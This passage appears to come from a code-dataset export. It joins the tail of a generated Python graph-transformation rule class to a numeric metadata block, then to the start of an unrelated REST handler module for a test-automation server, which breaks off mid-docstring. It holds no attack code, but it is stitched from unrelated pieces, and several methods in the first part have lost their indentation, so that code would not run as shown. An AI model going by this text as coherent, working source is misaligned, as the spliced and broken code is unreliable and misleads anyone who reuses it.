# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """1"""
self.vs[1]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[1]["mm__"] = """MT_pre__State"""
self.vs[1]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["GUID__"] = UUID('e04fad07-44c3-4984-a01d-0a49e0f967ce')
self.vs[2]["MT_subtypeMatching__"] = False
self.vs[2]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """2"""
self.vs[2]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[2]["mm__"] = """MT_pre__ExitPoint"""
self.vs[2]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["GUID__"] = UUID('782954d0-ac94-41cf-a96f-f0c59ed3d5e3')
self.vs[3]["MT_subtypeMatching__"] = False
self.vs[3]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """5"""
self.vs[3]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__Seq'
p2
a.""")
self.vs[3]["mm__"] = """MT_pre__Par"""
self.vs[3]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_dirty__"] = False
self.vs[3]["GUID__"] = UUID('4edc32bc-b287-4859-b29c-2fe8371c7cf6')
self.vs[4]["MT_subtypeMatching__"] = False
self.vs[4]["MT_label__"] = """11"""
self.vs[4]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[4]["mm__"] = """MT_pre__hasAttribute_S"""
self.vs[4]["MT_dirty__"] = False
self.vs[4]["GUID__"] = UUID('8ba17629-3157-4508-b536-29ac3e5e0815')
self.vs[5]["MT_subtypeMatching__"] = False
self.vs[5]["MT_label__"] = """9"""
self.vs[5]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[5]["mm__"] = """MT_pre__leftExpr"""
self.vs[5]["MT_dirty__"] = False
self.vs[5]["GUID__"] = UUID('545f77cd-8a95-4bdf-994e-3ce81c4b4000')
self.vs[6]["MT_subtypeMatching__"] = False
self.vs[6]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[6]["MT_label__"] = """3"""
self.vs[6]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[6]["mm__"] = """MT_pre__directLink_S"""
self.vs[6]["MT_dirty__"] = False
self.vs[6]["GUID__"] = UUID('c19fa7e9-a26a-4bd3-8c45-52bf3730b63a')
self.vs[7]["MT_subtypeMatching__"] = False
self.vs[7]["MT_pre__associationType"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[7]["MT_label__"] = """6"""
self.vs[7]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[7]["mm__"] = """MT_pre__directLink_T"""
self.vs[7]["MT_dirty__"] = False
self.vs[7]["GUID__"] = UUID('954e7ea1-fe00-40a6-813e-df6ff761c2ab')
self.vs[8]["MT_subtypeMatching__"] = False
self.vs[8]["MT_label__"] = """10"""
self.vs[8]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[8]["mm__"] = """MT_pre__rightExpr"""
self.vs[8]["MT_dirty__"] = False
self.vs[8]["GUID__"] = UUID('92c871e5-71ee-4d4a-ba84-ae16b4b126f7')
self.vs[9]["MT_subtypeMatching__"] = False
self.vs[9]["MT_pre__Type"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==Bool\u000a
p1
.""")
self.vs[9]["MT_label__"] = """7"""
self.vs[9]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[9]["mm__"] = """MT_pre__Constant"""
self.vs[9]["MT_pre__name"] = pickle.loads("""V\u000a#===============================================================================\u000a# This code is executed when evaluating if a node shall be matched by this rule.\u000a# You can access the value of the current node's attribute value by: attr_value.\u000a# You can access any attribute x of this node by: this['x'].\u000a# If the constraint relies on attribute values from other nodes,\u000a# use the LHS/NAC constraint instead.\u000a# The given constraint must evaluate to a boolean expression.\u000a#===============================================================================\u000a\u000areturn attr_value==true\u000a
p1
.""")
self.vs[9]["MT_dirty__"] = False
self.vs[9]["GUID__"] = UUID('0e0afbd2-0b08-4c80-93d8-22840624350e')
self.vs[10]["MT_subtypeMatching__"] = False
self.vs[10]["MT_pre__classtype"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[10]["MT_pre__cardinality"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[10]["MT_label__"] = """4"""
self.vs[10]["MT_subtypes__"] = pickle.loads("""(lp1
S'MT_pre__Module'
p2
a.""")
self.vs[10]["mm__"] = """MT_pre__ProcDef"""
self.vs[10]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[10]["MT_dirty__"] = False
self.vs[10]["GUID__"] = UUID('38aa4a3e-148d-4932-9e55-dbca6fedcec3')
self.vs[11]["MT_subtypeMatching__"] = False
self.vs[11]["MT_label__"] = """8"""
self.vs[11]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[11]["mm__"] = """MT_pre__Equation"""
self.vs[11]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[11]["MT_dirty__"] = False
self.vs[11]["GUID__"] = UUID('ff7cb62b-fc3b-4ddf-97b4-9932803b33e0')
self.vs[12]["MT_subtypeMatching__"] = False
self.vs[12]["MT_label__"] = """12"""
self.vs[12]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[12]["mm__"] = """MT_pre__trace_link"""
self.vs[12]["MT_dirty__"] = False
self.vs[12]["GUID__"] = UUID('2a7bc044-21d9-4cfa-a631-bbffad904630')
self.vs[13]["MT_subtypeMatching__"] = False
self.vs[13]["MT_label__"] = """13"""
self.vs[13]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[13]["mm__"] = """MT_pre__trace_link"""
self.vs[13]["MT_dirty__"] = False
self.vs[13]["GUID__"] = UUID('cca758e7-0943-47f3-a592-fc49db2e370a')
self.vs[14]["MT_subtypeMatching__"] = False
self.vs[14]["MT_label__"] = """14"""
self.vs[14]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[14]["mm__"] = """MT_pre__trace_link"""
self.vs[14]["MT_dirty__"] = False
self.vs[14]["GUID__"] = UUID('d899bfd5-ef12-40c0-ade6-c3ffcfa1a270')
self.vs[15]["MT_subtypeMatching__"] = False
self.vs[15]["MT_label__"] = """15"""
self.vs[15]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[15]["mm__"] = """MT_pre__trace_link"""
self.vs[15]["MT_dirty__"] = False
self.vs[15]["GUID__"] = UUID('cb2f1e47-1c15-49cd-b182-bf69ef2e46df')
def eval_TypeisComposite(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value==Bool
def eval_nameisComposite(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value==isComposite
def eval_classtype1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype5(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality5(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name5(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType3(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType6(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_Type7(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value==Bool
def eval_name7(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value==true
def eval_classtype4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name8(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| 52.529226
| 692
| 0.529488
| 3,927
| 33,251
| 4.360071
| 0.066463
| 0.040299
| 0.054667
| 0.042051
| 0.863567
| 0.818362
| 0.814975
| 0.785305
| 0.781801
| 0.781801
| 0
| 0.027446
| 0.196806
| 33,251
| 632
| 693
| 52.612342
| 0.613659
| 0.330727
| 0
| 0.554318
| 0
| 0.011142
| 0.637442
| 0.192386
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058496
| false
| 0
| 0.008357
| 0.052925
| 0.169916
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df4e4fd804a3e784ef8012f2f474399f3e0b6392
| 298,752
|
py
|
Python
|
src/ea/servercontrols/RestTesterFunctions.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 9
|
2019-09-01T04:56:28.000Z
|
2021-04-08T19:45:52.000Z
|
src/ea/servercontrols/RestTesterFunctions.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 5
|
2020-10-27T15:05:12.000Z
|
2021-12-13T13:48:11.000Z
|
src/ea/servercontrols/RestTesterFunctions.py
|
dmachard/extensivetesting
|
a5c3d2648aebcfaf1d0352a7aff8728ab843b73f
|
[
"MIT"
] | 2
|
2019-10-01T06:12:06.000Z
|
2020-04-29T13:28:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------
# Copyright (c) 2010-2021 Denis Machard
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -------------------------------------------------------------------
from pycnic.core import Handler
from pycnic.errors import HTTP_401, HTTP_400, HTTP_500, HTTP_403, HTTP_404
import os
import json
import wrapt
import yaml
from ea.libs import Settings
from ea.serverengine import (Context,
ProjectsManager,
TaskManager,
AgentsManager,
VariablesManager
)
from ea.serverrepositories import (RepoAdapters,
RepoTests,
RepoPublic,
RepoArchives)
from ea.libs.FileModels import TestSuite as TestSuite
from ea.libs.FileModels import TestUnit as TestUnit
from ea.libs.FileModels import TestPlan as TestPlan
class EmptyValue(Exception):
pass
class HandlerCORS(Handler):
def options(self):
return {}
@wrapt.decorator
def _to_yaml(wrapped, instance, args, kwargs):
"""
New in v17
public decorator for yaml generator
"""
return wrapped(*args, **kwargs)
def _get_user(request):
"""
Lookup a user session or return None if one doesn't exist
"""
sess_id = request.cookies.get("session_id")
if sess_id is None:
# new in v17, checking authorization header
authorization = request.get_header(name="Authorization", default=None)
if authorization is not None:
userP = Context.instance().apiBasicAuthorization(authorization=authorization)
if userP is None:
raise HTTP_401("Invalid credentials")
else:
return userP
else:
raise HTTP_401("Authorization header not detected")
# end of new
else:
if sess_id in Context.instance().getSessions():
return Context.instance().getSessions()[sess_id]
else:
raise HTTP_401("Invalid session")
def _check_project_permissions(user_login, project_id):
"""
Look up project
"""
try:
project_id = int(project_id)
except BaseException:
raise HTTP_400(
"Bad project id (Id=%s) provided in request, int expected" %
str(project_id))
# get the project id according to the name and checking permissions
project_authorized = ProjectsManager.instance().checkProjectsAuthorization(user=user_login,
projectId=project_id)
if not project_authorized:
raise HTTP_403('Permission denied to this project')
class AdaptersCheckSyntax(Handler):
"""
/rest/adapters/check/syntax
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: check the syntax of a adapter
description: ''
operationId: adaptersCheckSyntax
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-content ]
properties:
file-content:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
success:
type: boolean
syntax-error:
type: string
examples:
application/json: |
{
"cmd": "/adapters/check/syntax",
"file-content": "...."
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
try:
fileContent = self.request.data.get("file-content")
if fileContent is None:
raise EmptyValue("Please specify a file content")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
success, syntaxerror = RepoAdapters.instance().checkSyntax(content=fileContent)
return {"cmd": self.request.path,
"success": success,
"syntax-error": syntaxerror}
class AdaptersAdapterAdd(HandlerCORS):
"""
/rest/adapters/adapter/add
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Add a new adapter
description: ''
operationId: adaptersAdapterAdd
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
properties:
package-name:
type: string
adapter-name:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/adapter/add",
"message": "adapter added"
}
'400':
description: Bad request provided
'401':
description: unauthorized
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
packageName = self.request.data.get("package-name")
if packageName is None:
raise EmptyValue("Please specify a package name")
adapterName = self.request.data.get("adapter-name")
if adapterName is None:
raise EmptyValue("Please specify a adapter name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
success = RepoAdapters.instance().addAdapter(pathFolder=packageName,
adapterName=adapterName,
mainAdapters=False)
if success != Context.instance().CODE_OK:
raise HTTP_500("Unable to add adapter")
return {"cmd": self.request.path, "message": "adapter added"}
class AdaptersListing(HandlerCORS):
"""
/rest/adapters/listing
"""
@_to_yaml
def get(self):
"""
tags:
- adapters
summary: Get the listing of all adapters.
description: ''
operationId: adaptersListing
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
responses:
'200':
description: adapters listing
schema :
properties:
cmd:
type: string
adapters-listing:
type: string
examples:
application/json: |
{
"cmd": "/adapters/listing",
"adapters-listing": "...."
}
'400':
description: Bad request provided
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
_, _, listing, _ = RepoAdapters.instance().getTree()
return {"cmd": self.request.path, "adapters-listing": listing}
class AdaptersFileMove(HandlerCORS):
"""
/rest/adapters/file/move
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Move file
description: ''
operationId: adaptersFileMove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ file-name, file-path, file-extension ]
properties:
file-name:
type: string
file-path:
type: string
file-extension:
type: string
destination:
type: object
required: [ file-path ]
properties:
file-path:
type: string
responses:
'200':
description: move response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/file/move",
"message": "file successfully moved"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
filePath = self.request.data.get("source")["file-path"]
if filePath is None:
raise EmptyValue("Please specify a source filename")
fileName = self.request.data.get("source")["file-name"]
if fileName is None:
raise EmptyValue("Please specify a source file path")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newFilePath = self.request.data.get("destination")["file-path"]
if newFilePath is None:
raise EmptyValue("Please specify a destination file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
newFilePath = os.path.normpath("/" + newFilePath)
success = RepoAdapters.instance().moveFile(
mainPath=filePath,
fileName=fileName,
extFilename=fileExt,
newPath=newFilePath
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to move file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Move file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path, "message": "file successfully moved"}
class AdaptersDirectoryMove(HandlerCORS):
"""
/rest/adapters/directory/move
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Move directory
description: ''
operationId: adaptersDirectoryMove
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ source, destination ]
properties:
source:
type: object
required: [ directory-name, directory-path ]
properties:
directory-name:
type: string
directory-path:
type: string
destination:
type: object
required: [ directory-path ]
properties:
directory-path:
type: string
responses:
'200':
description: move response
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/adapters/directory/move",
"message": "directory successfully moved"
}
'400':
description: Bad request provided
'500':
description: Server error
"""
# get the user profile
user_profile = _get_user(request=self.request)
if user_profile['monitor']:
raise HTTP_403("Access refused")
# checking json request on post
try:
source = self.request.data.get("source")
if source is None:
raise EmptyValue("Please specify a source")
folderName = self.request.data.get("source")["directory-name"]
if folderName is None:
raise EmptyValue("Please specify a source folder name")
folderPath = self.request.data.get("source")["directory-path"]
if folderPath is None:
raise EmptyValue("Please specify a source folder path")
destination = self.request.data.get("destination")
if destination is None:
raise EmptyValue("Please specify a destination")
newFolderPath = self.request.data.get(
"destination")["directory-path"]
if newFolderPath is None:
raise EmptyValue("Please specify a destination folder path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# some security check to avoid directory traversal
folderPath = os.path.normpath("/" + folderPath)
newFolderPath = os.path.normpath("/" + newFolderPath)
if "%s/%s" % (folderPath, folderName) == newFolderPath:
raise HTTP_403("Destination same as origin")
# all ok, do the duplication
success = RepoAdapters.instance().moveDir(
mainPath=folderPath,
folderName=folderName,
newPath=newFolderPath
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to move directory")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500(
"Unable to move directory: source directory not found")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Directory already exists")
return {"cmd": self.request.path,
"message": "directory successfully moved"}
class AdaptersFileRename(HandlerCORS):
"""
/rest/adapters/file/rename
"""
@_to_yaml
def post(self):
"""
tags:
- adapters
summary: Rename file in the adapters storage
description: ''
operationId: adaptersFileRename
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
